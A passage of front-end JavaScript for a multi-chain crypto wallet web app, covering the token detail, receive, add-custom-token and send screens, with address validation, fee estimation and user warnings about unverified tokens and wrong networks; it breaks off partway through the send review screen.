function sparklineSvg(points, { width = 360, height = 140, color = 'var(--accent)' } = {}) {
  if (!points || points.length < 2) return `<div class="empty-state" style="padding:36px 0;font-size:13px">No chart data available.</div>`;
  const prices = points.map(p => p[1]);
  const min = Math.min(...prices), max = Math.max(...prices);
  const range = (max - min) || Math.abs(max) || 1;
  const stepX = width / (points.length - 1);
  const coords = prices.map((p, i) => [i * stepX, height - ((p - min) / range) * (height - 10) - 5]);
  const linePath = coords.map(([x, y], i) => `${i === 0 ? 'M' : 'L'}${x.toFixed(1)},${y.toFixed(1)}`).join(' ');
  const areaPath = `${linePath} L${width},${height} L0,${height} Z`;
  const gradId = 'sg' + Math.random().toString(36).slice(2, 9);
  return `<svg viewBox="0 0 ${width} ${height}" width="100%" height="${height}" preserveAspectRatio="none">
    <defs><linearGradient id="${gradId}" x1="0" y1="0" x2="0" y2="1">
      <stop offset="0%" stop-color="${color}" stop-opacity="0.28"/>
      <stop offset="100%" stop-color="${color}" stop-opacity="0"/>
    </linearGradient></defs>
    <path d="${areaPath}" fill="url(#${gradId})"/>
    <path d="${linePath}" fill="none" stroke="${color}" stroke-width="2.5" stroke-linejoin="round" stroke-linecap="round"/>
  </svg>`;
}

async function loadTokenDetail(chain, contract, range) {
  const owner = addressesFor(S.accountIndex)[chain];
  const params = new URLSearchParams({ chain, days: String(CHART_DAYS[range] || 1) });
  if (contract) params.set('contract', contract);
  if (owner) params.set('owner', owner);
  return fetch(`/api/token-detail?${params}`).then(r => r.json());
}

function renderTokenDetail() {
  const ctx = S.params; // { chain, symbol, name, contract, decimals }
  const node = mount(el(`
    <div class="shell">
      ${screenHeader(`<span style="display:inline-flex;align-items:center;gap:8px">${escapeHtml(ctx.symbol || '')}${netPillHtml(ctx.chain)}</span>`, true)}
      <div class="screen" id="detailBody">${loadingBalancesHtml('Loading…')}</div>
    </div>
  `));
  node.querySelector('[data-back]').addEventListener('click', () => goto('main', { tab: 'Tokens' }));
  loadTokenDetail(ctx.chain, ctx.contract, '1D')
    .then(data => renderTokenDetailBody(node, ctx, data, '1D'))
    .catch(() => { node.querySelector('#detailBody').innerHTML = `<div class="empty-state">Couldn't load this token right now. Check your connection and try again.</div>`; });
}

function renderTokenDetailBody(node, ctx, data, range) {
  if (data.error) { node.querySelector('#detailBody').innerHTML = `<div class="empty-state">${escapeHtml(data.error)}</div>`; return; }
  // Prefer the label the user tapped on (the curated list's "USDT / Tether USD") over the raw
  // on-chain symbol — Polygon's USDT contract literally reports "USDT0" — and surface the on-chain
  // symbol separately below so nothing is hidden.
  const symbol = ctx.symbol || data.symbol;
  const displayName = ctx.name || data.name || symbol;
  const onChainSymbol = data.symbol && data.symbol !== symbol ? data.symbol : null;
  const up = (data.change24h ?? 0) >= 0;
  const changeColorVar = up ? 'var(--success)' : 'var(--danger)';
  const sampled = downsample(data.chart || [], 120);
  const prices = sampled.map(p => p[1]);
  const max = prices.length ? Math.max(...prices) : null;
  const min = prices.length ? Math.min(...prices) : null;
  const owner = addressesFor(S.accountIndex)[ctx.chain];

  const body = el(`
    <div class="screen" id="detailBody">
      <div style="display:flex;align-items:center;gap:6px;color:var(--text-muted);font-weight:600;font-size:15px">${escapeHtml(displayName)}${data.verified ? renderIcon('verifiedBadge', 18) : ''}</div>
      <div style="font-size:32px;font-weight:800;margin-top:4px">${data.price != null ? fmtUsd(data.price) : '<span class="p-muted" style="font-size:18px;font-weight:600">No price data</span>'}</div>
      <div style="font-size:14px;margin-top:2px">
        ${data.change24h != null ? `<span style="color:${changeColorVar};font-weight:600">${up ? '+' : ''}${data.change24h.toFixed(2)}%</span>` : ''}
        <span class="p-muted">${new Date().toLocaleString(undefined, { month: 'short', day: 'numeric', hour: 'numeric', minute: '2-digit' })}</span>
      </div>

      ${max != null ? `<div class="p-muted mt-16" style="font-size:13px">${fmtUsd(max)}</div>` : '<div class="mt-16"></div>'}
      <div class="mt-8">${sparklineSvg(sampled, { color: changeColorVar })}</div>
      ${min != null ? `<div class="p-muted" style="font-size:13px">${fmtUsd(min)}</div>` : ''}

      <div class="chip-row mt-16" id="rangeTabs">
        ${Object.keys(CHART_DAYS).map(r => `<button class="chip ${r === range ? 'picked' : ''}" data-range="${r}" style="padding:7px 12px;font-size:13px">${r}</button>`).join('')}
      </div>

      <div class="actions-row" style="padding:16px 0">
        <button class="action-btn" id="d-buy">${renderIcon('dollar')}Buy</button>
        <button class="action-btn" id="d-swap">${renderIcon('swap')}Swap</button>
        <button class="action-btn" id="d-send">${renderIcon('send')}Send</button>
        <button class="action-btn" id="d-receive">${renderIcon('receive')}Receive</button>
      </div>

      <div class="list-section-label" style="padding-left:0">Your balance</div>
      <div id="ownBalanceRow"></div>

      <div class="list-section-label" style="padding-left:0">Security and trust</div>
      <div style="display:flex;align-items:center;gap:6px;font-weight:700;color:${data.verified ? 'var(--success)' : 'var(--warn-text)'};padding:4px 0 8px">
        ${data.verified ? renderIcon('check', 16) : '⚠️'}${data.verified ? 'Verified — listed on CoinGecko' : 'Not verified'}
      </div>
      ${data.verified ? '' : `<div class="warn-box">This token isn't in the public token list. Anyone can create a token with a familiar name — check the contract address against an official source before trusting it.</div>`}
      ${ctx.contract ? `<div class="p-muted" style="font-size:12.5px">Contract on ${escapeHtml(ctx.chain)}${onChainSymbol ? ` · on-chain symbol <b>${escapeHtml(onChainSymbol)}</b>` : ''}</div><div class="mono" style="margin:4px 0 20px;display:flex;align-items:center;gap:6px"><span style="flex:1;min-width:0;word-break:break-all">${escapeHtml(ctx.contract)}</span><button class="icon-btn" id="copyContract" title="Copy contract address">${renderIcon('copy', 14)}</button></div>` : ''}
    </div>
  `);
  node.querySelector('#detailBody').replaceWith(body);

  const balRow = el(tokenRowHtml({ chain: ctx.chain, symbol, name: displayName, contract: ctx.contract, type: ctx.contract ? undefined : 'NATIVE', logo: data.logo, balance: data.balance ?? '0', usd: data.usd, decimals: data.decimals }));
  balRow.style.cursor = 'default';
  body.querySelector('#ownBalanceRow').appendChild(balRow);
  body.querySelector('#copyContract')?.addEventListener('click', () => copyText(ctx.contract, 'Contract address copied'));

  body.querySelectorAll('[data-range]').forEach(btn => btn.onclick = async () => {
    const newRange = btn.dataset.range;
    body.innerHTML = loadingBalancesHtml('Loading…');
    const fresh = await loadTokenDetail(ctx.chain, ctx.contract, newRange);
    renderTokenDetailBody(node, ctx, fresh, newRange);
  });
  body.querySelector('#d-buy').onclick = () => toast('Buy isn\'t available yet — no fiat on-ramp is connected.');
  body.querySelector('#d-swap').onclick = () => goto('swap', { presetChain: ctx.chain, presetContract: ctx.contract || '' });
  body.querySelector('#d-send').onclick = () => goto('sendForm', { chain: ctx.chain, symbol, name: displayName, contract: ctx.contract, decimals: data.decimals, balance: data.balance ?? '0', price: data.price, logo: data.logo, from: 'tokenDetail', detailParams: { ...ctx } });
  body.querySelector('#d-receive').onclick = () => goto('receiveQr', { chain: ctx.chain, addr: owner, symbol: ctx.contract ? symbol : null, from: 'tokenDetail', detailParams: { ...ctx } });
}

// ══════════════════════════════════════════════════════════════════════════
//  RECEIVE
// ══════════════════════════════════════════════════════════════════════════
function renderReceive() {
  const addrs = addressesFor(S.accountIndex);
  const rows = ALL_CHAIN_NAMES.map(chain => ({ chain, addr: addrs[chain] }));
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Receive', true)}
      <div class="screen">
        <div class="search-field">${renderIcon('search', 16)}<input id="receiveSearch" placeholder="Search a network or token, e.g. USDT" value="${escapeHtml(S.receiveTokenSearch.query)}"></div>
        <div id="list"></div>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('main'));
  const list = node.querySelector('#list');

  const chainRow = (r) => {
    const cLogo = chainLogoUrl(r.chain);
    const cfg = EVM_CHAINS[r.chain] || OTHER_CHAINS[r.chain];
    const row = el(`<div class="list-row">
      <div class="token-icon" style="background:${chainIconStyle(r.chain)}">${r.chain[0]}${cLogo ? `<img src="${cLogo}" class="token-icon-img" onerror="this.remove()" alt="">` : ''}</div>
      <div class="token-main"><div class="token-name"><span class="sym">${escapeHtml(r.chain)}</span></div><div class="token-sub mono">${short(r.addr, 8, 6)}</div></div>
      <button class="icon-btn" data-copy title="Copy address">${renderIcon('copy', 16)}</button>
      <button class="icon-btn" data-qr title="Show QR code">${renderIcon('qr', 16)}</button>
    </div>`);
    const open = () => goto('receiveQr', { chain: r.chain, addr: r.addr, symbol: null, from: 'receive' });
    row.onclick = open;
    row.querySelector('[data-copy]').onclick = (e) => { e.stopPropagation(); copyText(r.addr, `${r.chain} address copied`); };
    row.querySelector('[data-qr]').onclick = (e) => { e.stopPropagation(); open(); };
    return row;
  };

  // A token hit (e.g. "USDT" on Tron) is rendered as that token on that network — logo, symbol and
  // a network pill — with the network's address underneath. Receiving a token is receiving to the
  // network's address, but the user thinks in terms of "my USDT-on-Tron address", so show it that way.
  const tokenRow = (t, addr) => {
    const row = el(`<div class="list-row">
      ${tokenIconHtml(t.chain, t)}
      <div class="token-main"><div class="token-name"><span class="sym">${escapeHtml(t.symbol)}</span>${netPillHtml(t.chain)}</div><div class="token-sub mono" title="${escapeHtml(t.name || '')}">${short(addr, 8, 6)}</div></div>
      <button class="icon-btn" data-copy title="Copy address">${renderIcon('copy', 16)}</button>
      <button class="icon-btn" data-qr title="Show QR code">${renderIcon('qr', 16)}</button>
    </div>`);
    const open = () => goto('receiveQr', { chain: t.chain, addr, symbol: t.contract ? t.symbol : null, from: 'receive' });
    row.onclick = open;
    row.querySelector('[data-copy]').onclick = (e) => { e.stopPropagation(); copyText(addr, `${t.chain} address copied`); };
    row.querySelector('[data-qr]').onclick = (e) => { e.stopPropagation(); open(); };
    return row;
  };

  function draw() {
    list.innerHTML = '';
    const filter = S.receiveTokenSearch.query.trim();
    if (!filter) {
      list.appendChild(el(`<div class="p-muted" style="font-size:13px;margin:-4px 0 10px">Pick the network the sender will use. Every EVM network shares one address; Bitcoin, Solana and Tron each have their own.</div>`));
      rows.forEach(r => list.appendChild(chainRow(r)));
      return;
    }
    const q = filter.toLowerCase();
    const chainNameMatches = rows.filter(r => r.chain.toLowerCase().includes(q));
    const matchedChains = new Set(chainNameMatches.map(r => r.chain));
    const tokenHits = S.receiveTokenSearch.results.filter(t => !matchedChains.has(t.chain));
    const stillSearching = S.receiveTokenSearch.loading && S.receiveTokenSearch.query === filter;

    if (chainNameMatches.length) { list.appendChild(el(`<div class="list-section-label" style="padding-left:0">Networks</div>`)); chainNameMatches.forEach(r => list.appendChild(chainRow(r))); }
    if (tokenHits.length) {
      list.appendChild(el(`<div class="list-section-label" style="padding-left:0">${escapeHtml(filter.toUpperCase())} by network</div>`));
      tokenHits.forEach(t => list.appendChild(tokenRow(t, addrs[t.chain])));
    }
    if (stillSearching) list.appendChild(el(loadingBalancesHtml('Searching…')));
    else if (!chainNameMatches.length && !tokenHits.length) list.appendChild(el(`<div class="empty-state">No networks or tokens matching "${escapeHtml(filter)}".</div>`));
  }
  draw();
  node.querySelector('#receiveSearch').oninput = (e) => searchReceiveTokens(e.target.value, draw);
}

function renderReceiveQr() {
  const { chain, addr, symbol, from, detailParams } = S.params;
  const cfg = EVM_CHAINS[chain] || OTHER_CHAINS[chain];
  const native = cfg?.native || chain;
  const what = symbol || native;
  const standard = symbol ? (EVM_CHAINS[chain] ? ' (ERC-20)' : chain === 'Tron' ? ' (TRC-20)' : chain === 'Solana' ? ' (SPL)' : '') : '';
  const node = mount(el(`
    <div class="shell">
      <div class="overlay" style="position:fixed">
        <div class="modal">
          <div class="row-between"><div style="width:34px"></div><h3 style="margin:0;display:inline-flex;align-items:center;gap:8px">Receive ${escapeHtml(what)}${netPillHtml(chain)}</h3><button class="icon-btn" id="close">${renderIcon('close', 18)}</button></div>
          <div class="p-muted" style="font-size:12.5px;margin-top:4px">${escapeHtml(accountName(S.accountIndex))}</div>
          <div class="qr-wrap mt-16" id="qr"></div>
          <div class="mono mt-16" style="color:var(--text)">${escapeHtml(addr)}</div>
          <div class="warn-box mt-16" style="text-align:left;margin-bottom:0">Send only <b>${escapeHtml(what)}${standard}</b> on the <b>${escapeHtml(chain)}</b> network to this address. Assets sent on another network can be lost permanently.</div>
          <button class="btn btn-secondary btn-block mt-16" id="copy">Copy address</button>
        </div>
      </div>
    </div>
  `));
  qrDataUrl(addr).then(url => { const img = document.createElement('img'); img.src = url; img.width = 220; img.height = 220; img.alt = `${chain} address QR code`; node.querySelector('#qr').appendChild(img); });
  const closeTo = () => from === 'tokenDetail' && detailParams ? goto('tokenDetail', detailParams) : goto('receive');
  node.querySelector('#close').onclick = closeTo;
  node.querySelector('.overlay').onclick = (e) => { if (e.target === e.currentTarget) closeTo(); };
  node.querySelector('#copy').onclick = () => copyText(addr, `${chain} address copied`);
}

// ══════════════════════════════════════════════════════════════════════════
//  ADD CUSTOM TOKEN
// ══════════════════════════════════════════════════════════════════════════
function renderAddToken() {
  const evmNames = Object.keys(EVM_CHAINS);
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Add custom token', true)}
      <div class="screen">
        <label class="label">Network</label>
        <select class="field" id="chain">${evmNames.map(c => `<option>${c}</option>`).join('')}</select>
        <label class="label mt-16">Token contract address</label>
        <input class="field" id="contract" placeholder="0x...">
        <div class="field-hint error" id="err" style="display:none"></div>
        <div style="flex:1"></div>
        <button class="btn btn-primary btn-block mt-16" id="add">Add token</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('main', { tab: 'Tokens' }));
  node.querySelector('#add').onclick = async () => {
    const chain = node.querySelector('#chain').value, contract = node.querySelector('#contract').value.trim();
    const errEl = node.querySelector('#err');
    if (!/^0x[0-9a-fA-F]{40}$/.test(contract)) { errEl.style.display = 'block'; errEl.textContent = 'Enter a valid contract address (0x followed by 40 hex characters).'; return; }
    errEl.style.display = 'none';
    const btn = node.querySelector('#add'); btn.disabled = true; btn.innerHTML = '<span class="spinner"></span>';
    try {
      const owner = currentAccount().evm.address;
      const r = await fetch('/api/custom-token', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ chain, owner, contract }) }).then(r => r.json());
      if (r.error) throw new Error(r.error);
      // Remember it (per chain, by contract) so it's included in every future balance refresh.
      S.meta.customTokens ??= {};
      const listForChain = (S.meta.customTokens[chain] ??= []);
      if (!listForChain.some(t => t.contract.toLowerCase() === contract.toLowerCase())) listForChain.push({ contract: r.token.contract, symbol: r.token.symbol, name: r.token.name, decimals: r.token.decimals });
      saveMeta(S.meta);
      S.balances[bkey()] ??= {};
      S.balances[bkey()][chain] ??= { address: owner, tokens: [] };
      const toks = S.balances[bkey()][chain].tokens;
      if (!toks.some(t => t.contract && t.contract.toLowerCase() === contract.toLowerCase())) toks.push({ ...r.token, custom: true });
      toast(`${r.token.symbol} added`, 2200, { success: true });
      goto('main', { tab: 'Tokens' });
    } catch (e) {
      btn.disabled = false; btn.textContent = 'Add token';
      const err = node.querySelector('#err'); err.style.display = 'block'; err.textContent = e.message;
    }
  };
}

// ══════════════════════════════════════════════════════════════════════════
//  SEND
// ══════════════════════════════════════════════════════════════════════════
function allOwnedTokens() {
  const acctBal = S.balances[bkey()] || {};
  const out = [];
  for (const chain of ALL_CHAIN_NAMES) { const c = acctBal[chain]; if (!c) continue; for (const t of c.tokens) out.push({ chain, ...t }); }
  return out;
}

// Like allOwnedTokens(), but for Send specifically: every chain's native asset always gets a row,
// even before balances have loaded or if that chain's balance fetch failed — so the list degrades
// gracefully instead of going blank on a partial/failed fetch. The
// balance defaults to '0' (never null) so the amount-vs-balance check in the send form still
// blocks sending until the real balance is confirmed.
function sendableTokens() {
  const acctBal = S.balances[bkey()] || {};
  const out = [];
  for (const chain of ALL_CHAIN_NAMES) {
    const meta = EVM_CHAINS[chain] || OTHER_CHAINS[chain];
    const chainData = acctBal[chain];
    const nativeToken = chainData?.tokens?.find(t => !t.contract);
    out.push(nativeToken
      ? { chain, ...nativeToken }
      : { chain, symbol: meta.native, name: meta.native, contract: null, decimals: EVM_CHAINS[chain] ? 18 : meta.decimals, type: 'NATIVE', balance: '0', price: null, usd: null });
    for (const t of chainData?.tokens || []) { if (t.contract && parseFloat(t.balance) > 0) out.push({ chain, ...t }); }
  }
  return out;
}

function renderSend() {
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Send', true)}
      <div class="screen">
        <div class="search-field">${renderIcon('search', 16)}<input placeholder="Search a token to send, e.g. USDT" id="q" value="${escapeHtml(S.sendSearch.query)}"></div>
        <div id="list" class="token-list"></div>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('main'));
  const list = node.querySelector('#list');
  const viewedIndex = S.accountIndex;
  function draw() {
    if (!node.isConnected) return;
    const filter = S.sendSearch.query.trim();
    const q = filter.toLowerCase();
    const localMatches = sendableTokens().filter(t => !filter || t.symbol.toLowerCase().includes(q) || t.name?.toLowerCase().includes(q));
    // What you hold comes first (largest value on top); zero-balance native coins after that, so
    // the list opens on the assets you can actually send right now.
    localMatches.sort((a, b) => {
      const av = parseFloat(a.balance) > 0 ? 1 : 0, bv = parseFloat(b.balance) > 0 ? 1 : 0;
      if (av !== bv) return bv - av;
      return (parseFloat(b.usd) || 0) - (parseFloat(a.usd) || 0);
    });
    // A token found only via search (not owned, not a chain's native asset) has no confirmed
    // balance yet — it's marked `resolve` so the send form looks up the real balance and decimals
    // before letting anything through.
    const seen = new Set(localMatches.map(t => `${t.chain}|${(t.contract || 'native').toLowerCase()}`));
    const searchExtras = filter
      ? S.sendSearch.results.filter(t => !seen.has(`${t.chain}|${(t.contract || 'native').toLowerCase()}`)).map(t => ({ ...t, balance: '0', usd: null, resolve: true }))
      : [];
    const tokens = [...localMatches, ...searchExtras];
    const stillSearching = filter && S.sendSearch.loading && S.sendSearch.query === filter;
    const loadingBalances = S.loadingIndices.has(bkey(viewedIndex));

    list.innerHTML = '';
    if (!filter) {
      list.appendChild(el(`<div class="p-muted" style="font-size:13px;margin:-4px 0 6px">${loadingBalances ? 'Checking balances…' : 'Your assets'}</div>`));
    } else if (tokens.length) {
      list.appendChild(el(`<div class="p-muted" style="font-size:13px;margin:-4px 0 6px">Results for "${escapeHtml(filter)}" — one row per network</div>`));
    }
    tokens.forEach(t => {
      const row = el(tokenRowHtml(t));
      row.onclick = () => goto('sendForm', { chain: t.chain, symbol: t.symbol, name: t.name, contract: t.contract, decimals: t.decimals, balance: t.balance, price: t.price, logo: t.logo, resolve: !!t.resolve, from: 'send' });
      list.appendChild(row);
    });
    if (stillSearching) list.appendChild(el(loadingBalancesHtml('Searching all networks…')));
    else if (!tokens.length) list.appendChild(el(`<div class="empty-state">No token matching "${escapeHtml(filter)}" on any network.</div>`));
  }
  draw();
  if (!Object.keys(S.balances[bkey(viewedIndex)] || {}).length && !S.loadingIndices.has(bkey(viewedIndex))) setTimeout(() => loadBalances(viewedIndex), 0);
  node.querySelector('#q').oninput = e => searchSendTokens(e.target.value, draw);
}

function validateAddressFor(chain, addr) {
  addr = (addr || '').trim();
  if (!addr) return false;
  if (EVM_CHAINS[chain]) return /^0x[0-9a-fA-F]{40}$/.test(addr);
  if (chain === 'Solana') return addr.length >= 32 && addr.length <= 44 && /^[1-9A-HJ-NP-Za-km-z]+$/.test(addr);
  if (chain === 'Bitcoin') return /^(bc1|1|3)[a-zA-HJ-NP-Z0-9]{20,60}$/.test(addr);
  if (chain === 'Tron') return /^T[a-zA-Z0-9]{33}$/.test(addr);
  return true;
}

function nativeSymbolFor(chain) { return (EVM_CHAINS[chain] || OTHER_CHAINS[chain])?.native || ''; }

// Every account in every unlocked wallet, with its address on `chain`.
function ownAccountsForChain(chain) {
  const out = [];
  for (const w of S.meta.wallets) {
    if (!mnemonicFor(w.id)) continue;
    for (let i = 0; i < w.accountCount; i++) out.push({ wid: w.id, walletName: w.name, index: i, name: accountName(i, w.id), address: addressesFor(i, w.id)[chain] });
  }
  return out;
}
// "Account 2 · Daily wallet" if `address` is one of ours on `chain`, else null.
function ownAccountLabel(chain, address) {
  const a = (address || '').trim().toLowerCase();
  const hit = ownAccountsForChain(chain).find(x => x.address.toLowerCase() === a);
  return hit ? `${hit.name}${S.meta.wallets.length > 1 ? ` · ${hit.walletName}` : ''}` : null;
}
function nativeBalanceFor(chain) {
  const t = S.balances[bkey()]?.[chain]?.tokens?.find(x => !x.contract);
  return t ? parseFloat(t.balance) : null; // null = unknown (balances not loaded / fetch failed)
}
// Trim a float to something a chain will accept as an amount string (no exponent, bounded decimals).
function trimAmount(n, decimals = 18) { return n <= 0 ? '0' : n.toFixed(Math.min(decimals, 8)).replace(/\.?0+$/, ''); }

async function estimateFeeFor({ chain, to, amount, contract, decimals }) {
  const acct = currentAccount();
  if (EVM_CHAINS[chain]) return ops.estimateEvmFee({ chain, from: acct.evm.address, to, amount, contract, decimals });
  if (chain === 'Solana') return ops.estimateSolanaFee();
  if (chain === 'Bitcoin') return ops.estimateBtcFee({ from: acct.bitcoin.address, amount });
  if (chain === 'Tron') return ops.estimateTronFee({ contract });
  throw new Error('Unsupported chain');
}

function renderSendForm() {
  const p = S.params; // { chain, symbol, name, contract, decimals, balance, price, logo, resolve, from, detailParams }
  const { chain, symbol, contract } = p;
  let { decimals, balance, price } = p;
  const isNative = !contract;
  const node = mount(el(`
    <div class="shell">
      ${screenHeader(`<span style="display:inline-flex;align-items:center;gap:8px">Send ${escapeHtml(symbol)}${netPillHtml(chain)}</span>`, true)}
      <div class="screen">
        <div id="assetRow" class="token-list" style="margin:0 -16px 8px"></div>
        <label class="label mt-8">To</label>
        <input class="field" id="to" placeholder="Paste a ${escapeHtml(chain)} address, or pick an account below" autocomplete="off" spellcheck="false">
        <div class="field-hint error" id="toErr" style="display:none"></div>
        <div id="ownPick"></div>
        <label class="label mt-16">Amount</label>
        <input class="field" id="amt" placeholder="0.0" inputmode="decimal" autocomplete="off">
        <div class="row-between mt-8">
          <div class="p-muted" id="usdEq"></div>
          <button class="btn-link" id="max">Max: ${fmtNum(balance)} ${escapeHtml(symbol)}</button>
        </div>
        <div class="field-hint error" id="amtErr" style="display:none"></div>
        ${isNative ? `<div class="field-hint" style="margin-top:10px">Network fees are paid in ${escapeHtml(symbol)}, so "Max" leaves a little aside for the fee.</div>` : `<div class="field-hint" style="margin-top:10px">Sending ${escapeHtml(symbol)} costs a small network fee paid in ${escapeHtml(nativeSymbolFor(chain))}.</div>`}
        <div style="flex:1"></div>
        <button class="btn btn-primary btn-block mt-16" id="cont">Continue</button>
      </div>
    </div>
  `));
  const goBack = () => p.from === 'tokenDetail' && p.detailParams ? goto('tokenDetail', p.detailParams) : goto('send');
  node.querySelector('[data-back]')?.addEventListener('click', goBack);
  const to = node.querySelector('#to'), amt = node.querySelector('#amt'), maxBtn = node.querySelector('#max'), usdEq = node.querySelector('#usdEq');

  // "Send to one of my accounts": every other account in every wallet, with its address on THIS
  // network — tap to fill the recipient field, no copy/paste. Manual entry keeps working as-is.
  const others = ownAccountsForChain(chain).filter(a => !(a.wid === S.walletId && a.index === S.accountIndex));
  const ownPick = node.querySelector('#ownPick');
  if (others.length) {
    const multiWallet = S.meta.wallets.length > 1;
    const wrap = el(`<div class="own-pick">
      <div class="own-pick-head" id="ownToggle">
        <span>Or send to one of your accounts</span>${renderIcon('chevronDown', 16)}
      </div>
      <div class="own-pick-list" id="ownList">
        ${S.meta.wallets.map(w => {
          const rows = others.filter(a => a.wid === w.id);
          if (!rows.length) return '';
          return `${multiWallet ? `<div class="own-pick-wallet">${escapeHtml(w.name)}</div>` : ''}${rows.map(a => `
            <div class="own-pick-row" data-addr="${escapeHtml(a.address)}" data-label="${escapeHtml(a.name)}${multiWallet ? ` · ${escapeHtml(w.name)}` : ''}">
              <div class="acct-avatar" style="width:30px;height:30px;border-radius:9px;font-size:13px;background:${accountColor(a.index + w.id.length)}">${escapeHtml(a.name[0].toUpperCase())}</div>
              <div class="token-main"><div class="token-name"><span class="sym">${escapeHtml(a.name)}</span></div><div class="token-sub mono" style="font-size:12px">${short(a.address, 8, 6)}</div></div>
              <span class="own-pick-check">${renderIcon('check', 16)}</span>
            </div>`).join('')}`;
        }).join('')}
      </div>
    </div>`);
    ownPick.appendChild(wrap);
    const listEl = wrap.querySelector('#ownList');
    const toggle = wrap.querySelector('#ownToggle');
    const markSelected = () => {
      const v = to.value.trim().toLowerCase();
      let hit = null;
      wrap.querySelectorAll('.own-pick-row').forEach(r => { const on = r.dataset.addr.toLowerCase() === v; r.classList.toggle('selected', on); if (on) hit = r.dataset.label; });
      toggle.querySelector('span').textContent = hit ? `Sending to ${hit}` : 'Or send to one of your accounts';
      toggle.classList.toggle('has-pick', !!hit);
    };
    wrap.querySelectorAll('.own-pick-row').forEach(r => r.onclick = () => {
      to.value = r.dataset.addr;
      node.querySelector('#toErr').style.display = 'none';
      markSelected();
      listEl.hidden = true; toggle.classList.add('collapsed');
      amt.focus();
    });
    toggle.onclick = () => { listEl.hidden = !listEl.hidden; toggle.classList.toggle('collapsed', listEl.hidden); };
    to.addEventListener('input', markSelected);
  }

  const drawAsset = () => {
    const row = el(tokenRowHtml({ chain, symbol, name: p.name, contract, logo: p.logo, type: isNative ? 'NATIVE' : undefined, balance, usd: price != null ? (parseFloat(balance) * price).toFixed(2) : null, decimals }));
    row.style.cursor = 'default';
    node.querySelector('#assetRow').replaceChildren(row);
    maxBtn.textContent = `Max: ${fmtNum(balance)} ${symbol}`;
  };
  drawAsset();

  // A token that came from search (or a row with no decimals) needs its real on-chain balance and
  // decimals before we can build a correct transfer — do that up front.
  if (p.resolve || decimals == null) {
    maxBtn.textContent = 'Checking balance…';
    const owner = addressesFor(S.accountIndex)[chain];
    const params = new URLSearchParams({ chain, owner });
    if (contract) params.set('contract', contract);
    fetch(`/api/token-detail?${params}`).then(r => r.json()).then(d => {
      if (d.error) throw new Error(d.error);
      if (d.decimals != null) decimals = d.decimals;
      if (d.balance != null) balance = d.balance;
      if (d.price != null) price = d.price;
      if (d.name && !p.name) p.name = d.name;
      if (d.logo) p.logo = d.logo;
      drawAsset();
    }).catch(() => { maxBtn.textContent = `Max: ${fmtNum(balance)} ${symbol}`; toast('Couldn\'t confirm this token\'s balance — check your connection.'); });
  }

  amt.oninput = () => { usdEq.textContent = price != null && amt.value ? '≈ ' + fmtUsd((parseFloat(amt.value) || 0) * price) : ''; node.querySelector('#amtErr').style.display = 'none'; };
  to.oninput = () => { node.querySelector('#toErr').style.display = 'none'; };
  maxBtn.onclick = async () => {
    if (!isNative) { amt.value = balance; amt.dispatchEvent(new Event('input')); return; }
    // Native coin: "everything" has to leave room for the network fee, otherwise the send fails.
    maxBtn.disabled = true; const label = maxBtn.textContent; maxBtn.textContent = 'Estimating fee…';
    try {
      const fee = await estimateFeeFor({ chain, to: validateAddressFor(chain, to.value) ? to.value.trim() : undefined, amount: balance, contract, decimals });
      const spendable = parseFloat(balance) - parseFloat(fee.feeNative) * 1.15; // 15% headroom for fee drift between estimate and broadcast
      amt.value = trimAmount(Math.max(0, spendable), decimals ?? 18);
    } catch { amt.value = balance; }
    maxBtn.disabled = false; maxBtn.textContent = label;
    amt.dispatchEvent(new Event('input'));
  };
  node.querySelector('#cont').onclick = () => {
    let ok = true;
    const toErr = node.querySelector('#toErr'), amtErr = node.querySelector('#amtErr');
    const own = addressesFor(S.accountIndex)[chain];
    if (!validateAddressFor(chain, to.value)) { toErr.style.display = 'block'; toErr.textContent = `That doesn't look like a valid ${chain} address.`; ok = false; }
    else if (own && to.value.trim().toLowerCase() === own.toLowerCase()) { toErr.style.display = 'block'; toErr.textContent = 'That\'s this account\'s own address — sending to yourself would only cost a fee.'; ok = false; }
    else toErr.style.display = 'none';
    const a = parseFloat(amt.value);
    if (!(a > 0)) { amtErr.style.display = 'block'; amtErr.textContent = 'Enter an amount greater than 0.'; ok = false; }
    else if (a > parseFloat(balance)) { amtErr.style.display = 'block'; amtErr.textContent = `You only have ${fmtNum(balance)} ${symbol} on ${chain}.`; ok = false; }
    else if (decimals == null) { amtErr.style.display = 'block'; amtErr.textContent = 'Still confirming this token\'s details — try again in a moment.'; ok = false; }
    else amtErr.style.display = 'none';
    if (!ok) return;
    goto('sendReview', { ...p, decimals, balance, price, to: to.value.trim(), amount: amt.value.trim() });
  };
}

function renderSendReview() {
  const { chain, symbol, contract, decimals, to, amount, price, balance } = S.params;
  const isNative = !contract;
  const nativeSym = nativeSymbolFor(chain);
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Review', true)}
      <div class="screen">
        <div class="text-center mt-16">
          <div class="p-muted" style="font-size:13px;margin-bottom:6px">You're sending</div>
          <div style="font-size:30px;font-weight:800;word-break:break-all">${escapeHtml(fmtNum(amount, 8))} ${escapeHtml(symbol)}</div>
          <div class="p-muted">${price != null ? fmtUsd((parseFloat(amount) || 0) * price) : ''}</div>
          <div style="margin-top:10px">${netPillHtml(chain)}</div>
        </div>
        <div class="mt-24">
          <div class="row-between" style="padding:10px 0;border-bottom:1px solid var(--border)"><span class="p-muted">From</span><span>${escapeHtml(accountName(S.accountIndex))}</span></div>
          <div class="row-between" style="padding:10px 0;border-bottom:1px solid var(--border);gap:12px;align-items:flex-start"><span class="p-muted">To</span><span style="text-align:right;min-width:0">${ownAccountLabel(chain, to) ? `<div style="font-weight:600">${escapeHtml(ownAccountLabel(chain, to))} <span class="p-muted" style="font-weight:500;font-size:12px">(your account)</span></div>` : ''}<div class="mono" style="color:var(--text)">${escapeHtml(to)}</div></span></div>
          <div class="row-between" style="padding:10px 0;border-bottom:1px solid var(--border)"><span class="p-muted">Network</span><span>${escapeHtml(chain)}</span></div>
          <div class="row-between" style="padding:10px 0"><span class="p-muted">Network fee</span><span id="fee">estimating…</span></div>
        </div>
        <div class="danger-box" id="feeWarn" style="display:none"></div>
